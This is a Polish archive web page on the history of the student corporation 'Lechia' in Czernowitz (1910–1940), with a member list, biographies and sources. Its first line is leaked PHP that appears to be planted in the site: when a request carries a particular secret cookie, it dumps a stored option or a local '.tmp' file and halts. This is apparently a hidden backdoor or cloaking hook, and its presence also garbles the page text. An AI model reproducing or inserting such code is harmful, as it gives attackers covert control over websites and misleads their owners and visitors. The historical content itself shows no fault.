if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Lechia

Dekiel Lechii - vide Poszukiwania. Nazwa:
Korporacja Akademików Polskich “Lechia”
Siedziba:
Czerniowce
Data powstania:
1910 r.
Barwy:
biała – niebieska – czerwona
Dewiza:
“Przez miłość do jedności, przez jedność do wolności”

Rys historyczny

Strona tytułowa programu Komersu XXV-lecia Lechii w dniu 3 II 1935 r. w Czerniowcach.

Lechia powstała w 1910 r. w wyniku nieporozumień w Towarzystwie akademików polskich “Ognisko” w Czerniowcach. Grupa byłych członków Ogniska wraz z innymi polskimi studentami - byłymi członkami austriackich korpsów Alemania i Gothia postanowiła założyć polską korporację akademicką opartą ściślej o tradycje niemieckich Burschenschaftów. Lechia skupiała w konsekwencji wyłącznie Polaków i w odróżnieniu od Ogniska miała charakter duelancki. Wiązał się z tym obowiązek udzielania satysfakcji honorowej z bronią w ręku. Czerniowiecka Lechia istniała 30 lat i zakończyła działalność po zajęciu miasta przez wojska rosyjskie w 1940 r.

Lechia działała na rzecz integracji studentów-Polaków, umacniania polskości na Bukowinie oraz współpracy kulturalnej polsko-rumuńskiej. Komers Lechii, Czerniowce 10 VII 1936 r. W 1938 r. w ramach Korporacji istniały sekcje: sceniczna, literacka, społeczna. Była członkiem Związku Stowarzyszeń Polskich w Rumunii. Współpracowała m.in. ze wspomnianym Ogniskiem oraz Polskim Towarzystwem Gimnastycznym “Sokół” w Czerniowcach. Utrzymywała kontakty z korporacjami rumuńskimi Bucovina i Moldova oraz wielonarodowościową (austriacką) Gothią.

Korporacja cieszyła się znacznym społecznym uznaniem. W latach 30-tych powstało w Katowicach Koło Filistrów Lechii. W obchodach 25. rocznicy powołania korporacji w dniu 3 II 1935 r. wzięli udział przedstawiciele rumuńskich władz państwowych, władze czerniowieckiego Uniwersytetu oraz liczni przedstawiciele organizacji polskich z Rumunii. Lechia, przed Uniwersytetem, Czerniowce ok. 1935 r. Na obchody przybyły także delegacje korporacji z Polski, w tym z poznańskiej Lechii oraz lwowskiego Znicza.

Od lewej: Kazimierz Mitelski, Siemiątkowski, Czerniowce lata 30-te.

Prawdopodobnie w dwudziestoleciu międzywojennym przy wsparciu Lechii powstała korporacja polskich gimnazjalistów Jagiellonia, która miała stanowić swoiste zaplecze kadrowe dla korporacji.

Całkowita ustalona, choć niekompletna imienna liczba członków obejmuje 56 nazwisk, w tym pięciu członków honorowych.

Brak wiadomości o działalności Korporacji i spotkaniach jej członków w okresie powojennym.

Lista członków

Poniższa, niekompletna lista członków Lechii obejmuje około 50 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Wiktor Buliński, nadkomisarz Policji w Katowicach (1935), Filister honorowy Lechii
 2. Mieczysław Grabiński, konsul RP, Filister honorowy Lechii (1933)
 3. P. Jampolski, płk WP, Filister honorowy Lechii
 4. dr Eugeniusz Mitkiewicz, Filister honorowy Lechii
 5. Henryk Zucker, redaktor, Filister honorowy Lechii

Członkowie rzeczywiści

 1. Kajetan Amirowicz,
 2. Kajetan Antonowicz,
 3. Antoni Bogusiewicz, ostatni prezes 1940

  Wilhelm Czernichowski (?), 1936 r.

 4. Wilhelm Czernichowski, ( - po 1945 w Katowicach ?)

 5. Czerwonka, ( - po 1945 w Londynie ?) po wojnie na emigracji w Wielkiej Brytanii
 6. Franciszek Dąbrowski, ( - po 1945 w Bukareszcie ?)
 7. A. Dobrowolski, dr, sekretarz Koła Starych Strzech Lechii w Polsce 1935;
 8. Wacław Donabidowicz, po wojnie miał został w Suczawie w Rumunii
 9. Kazimierz Dorogostajski
 10. Zygmunt Dubi, (1914 - ) harcerz, więziony przez wiele lat na Syberii

  Franciszek Duda, 1935 r.

 11. Franciszek Duda, (11 listopada 1915 w Czerniowcach - 22 marca 1988 w Tarnowie) s. kolejarza Michała i Albiny z d. Matusz, absolwent Gimnazjum Aron Pumnul w Czerniowcach, student prawa Uniwersytetu Króla Karola w Czerniowcach 1933, studia ukończył na Uniwersytecie w Bukareszcie 1941, działacz harcerski i korporacyjny, po wybuchu wojny organizator i realizator przerzutu Skarbu Narodowego Polski przez Rumunię do partu Konstancja nad Morzem Czarnym, po wkroczeniu wojsk rosyjskich do Czerniowiec przedostał się do Rumunii i pracował jako radca prawny przetwórni mięs “Abator” w Suczawie, a później w Turnu Severin, w 1947 jako repatriant przyjechał do Polski, organizator i dyrektor placówek Polskiej Agencji Drzewnej “Paged” w Szczecinku i Tarnowie, radca prawny i dyrektor pionu organizacyjno-prawnego Tarnowskiego Okręgu Gazownictwa Ziemnego, dyrektor administracyjny Tarnowskiego Przedsiębiorstwa Budownictwa Ogólnego, pochowany na Starym Cmentarzu w Tarnowie

  Roman Gazda (?), 1936 r.

 12. Roman Gazda, ( - zm. w Czerniowcach ?)

 13. Jacnański,

  Grzegorz Janowicz, ok. 1937 r.

 14. Grzegorz Janowicz, brat Jana (Lechia), zginął na początku działań wojennych

  Jan Janowicz, druga poł. lat 30-tych.

 15. Jan Janowicz, brat Grzegorza (Lechia), został po wojnie w Bukareszcie

 16. Czesław Konecki,

  Jan Łopuszański.

 17. Jan Łopuszański, student prawa, zaginął w 1941

 18. J. Machowski, dr, prezes Koła Starych Strzech Lechii w Polsce 1935

  Bolesław Malinowski, lata 30-te.

 19. Bolesław Malinowski, prezes 1938

 20. Tadeusz Miciński, wiceprezes listopad 1921

  Kazimierz Mitelski, lata 30-te.

 21. Kazimierz Mitelski, (1909-1985) prof. polskiego Gimnazjum w Czerniowcach, pochowany na cmentarzu Węglowa Wola w Warszawie

 22. Mizunka,
 23. Antoni Mraczek, (5 czerwca 1919 w Czerniowcach - ) s. Józefa i Marii ze Smolnickich, brat Franciszka (Lechia), matura w Czerniowcach, student i absolwent studiów handlowo-przemysłowych na Studiach Wyższych Nauk Przemysłowo-Handlowych w Bukareszcie 1939-47 (nostryfikacja dyplomu SGW 1949), studia doktoranckie Wyższa Szkoła Handlu Zagranicznego w Wiedniu 1970-75, dr nauk ekonomicznych (?), tłumacz przysięgły języka niemieckiego i rumuńskiego, referent MSZ w Warszawie 1947-49, kierownik działu ekonomicznego z Zjednoczeniu Przemysłu Koncentratów Spożywczych w Warszawie 1949-58, zastępca dyrektora Zakładu Graficznego “Dom Słowa Polskiego” w Warszawie 1958, kierownik działów w przedsiębiorstwach handlu zagranicznego w Warszawie: Rolimpex 1958-62, Prodimex 1962-66, Varimex 1966-67, wykładowca niemieckiego w Spółdzielni Pracy “Lingwista Oświata” w Warszawie 1966-70, rzeczoznawca w przedsiębiorstwie ZREMB w Warszawie 1967, starszy radca w Centralnym Urzędzie Jakości i Miar w Warszawie 1969-70, właściciel biura tłumaczeń w Wiedniu 1975-1997, założyciel i fundator “Fundacji promocji międzynarodowej współpracy naukowej i wdrożeń racjonalizatorskich dla utrzymania pokoju” w Warszawie 1990

  Franciszek Mraczek, 1936 r.

 24. Franciszek Mraczek, (15 września 1915 w Czerniowcach - 9 lipca 2013) s. Józefa i Marii ze Smolnickich, brat Antoniego (Lechia), student i absolwent med. Uniwersytet w Jassach w Mołdawii, dr med. 1939, chirurg, specjalista z zakresu rehabilitacji, w 1947 przyjechał do Polski, od 1947 dyrektor szpitali w Głuszycy i Nowej Rudzie, kierownik poradni chirurgicznej przy Szpitalu w Nowej Rudzie oraz poradni rehabilitacyjnej przy kopalni Nowa Ruda, odznaczony m.in. Medalem im. prof. Jana Mikulicz-Radeckiego, Odznaką “Zasłużony dla miasta i gminy Głuszyca”, Srebrnym Krzyżem Zasługi, pochowany Cmentarzu Parafialnym im. św. Rodziny we Wrocławiu (Sępolno)

  Longin (?) Oliwa (?), 1936 r.

 25. Longin (?) Oliwa

 26. Wacław Oliwa, farmaceuta, po wojnie na emigracji w Wielkiej Brytanii

  Maksymilian Osman, 1935 r.

 27. Maksymilian Osman, (1910-1991)

 28. Podhorski, brat drugiego, obaj z Bukaresztu
 29. Podhorski, brat drugiego, obaj z Bukaresztu
 30. Jan Pustelnik, skarbnik listopad 1921
 31. Franciszek Różyłowicz, założyciel Lechii, pierwszy prezes 1910 [prawd. Franciszek Antoni Różyłowicz (4 czerwca 1888 w Stryju - ) s. Jana i Antoniny z Kościńskich], vide www.rozylowicz.com]
 32. Jan Sanecki, prof. polskiego gimnazjum w Czerniowcach, po wojnie w Polsce
 33. Wacław Sanicki, po wojnie pracownik PP
 34. Stanisław Schwann, (1912-1982) pracownik naukowy Politechniki Szczecińskiej

  Siemiątkowski, lata 30-te.

 35. Siemiątkowski,

 36. Stebelski, po wojnie na emigracji w Wielkiej Brytanii
 37. Otto Stelingowski, prezes 1934, komendant hufca w Czerniowcach, po wojnie na emigracji w Wielkiej Brytanii (?)
 38. Władysław Szury, nauczyciel w polskim Gimnazjum w Czerniowcach
 39. Eugeniusz Szlimkiewicz (Schlimkiewicz), wiceprezes 1935
 40. Adolf Szymonowicz, polonista, dr, nauczyciel (dyrektor ?) w polskim Gimnazjum w Czerniowcach
 41. Zygmunt Tarnawski, matematyk, nauczyciel w polskim Gimnazjum w Czerniowcach
 42. Kazimierz Tarnowski (Tarnawski),
 43. Franciszek Toczyński,
 44. Artur Twardowski
 45. Bronisław Urbański, nauczyciel rysunków w polskim Gimnazjum w Czerniowcach
 46. Boleslaw Wachlowski

  Kazimierz Zahorski, lata 30-te.

 47. Kazimierz Zahorski, (26 października 1908 w Sucica Veche k. Czerniowiec - 14 września 1987 w Warszawie) s. Józefa i Marii z d. Sorycz, absolwent Liceum im. Aron Pumnul w Czerniowcach, student i absolwent nauk przyrodniczych Uniwersytetu Króla Carola w Czerniowcach, w czasie wojny pracował w Ambasadzie RP w Bukareszcie oraz jako nauczyciel w szkołach państwowych, organizator i przewodniczący Domu Polskiego w Craiowej w Rumunii, członek Polskiego Zjednoczenia Demokratycznego w Rumunii, po wojnie przyjechał do Polski, Po powrocie do Polski, pracował na stanowiskach kierowniczych w Spółdzielni Samopomoc Chłopska, Ministerstwie Szkolnictwa Wyższego i Szkole Głównej Gospodarstwa Wiejskiego, odznaczony m.in. Medalem 10-lecia Polski Ludowej, Złotym Krzyżem Zasługi, Krzyżem Kawalerskim OOP

 48. K. Zarzymski, nauczyciel muzyki w polskim Gimnazjum w Czerniowcach, po wojnie pozostał w Rumunii
 49. Mieczysław Zarzymski, fuks 1935
 50. Bronisław Ziemiankowski, ( - 1976) prezes 1935 (Prezydium XXV-lecia), mgr ichtiolog, późniejszy główny ichtiolog delty Dunaju
 51. Kazimierz Żukowski, prezes listopad 1921, dr

Pieczęć Związku Filistrów Lechii w Polsce, 1935 r.

Listę członków opracowano na podstawie:

1) Patryk Tomaszewski, Polska Akademicka Korporacja “Lechia” w Czerniowcach 1910-1940, (w:) Polska i Rumunia - od historycznego sąsiedztwa do europejskiego partnerstwa, Sucava 2009,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Lechia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 28 VII 2010 r.
Ostatnie zmiany: 25 XI 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Akademików Polskich “Lechia” (Czerniowce), (na:) www.archiwumkorporacyjne.pl, stan 25 XI 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }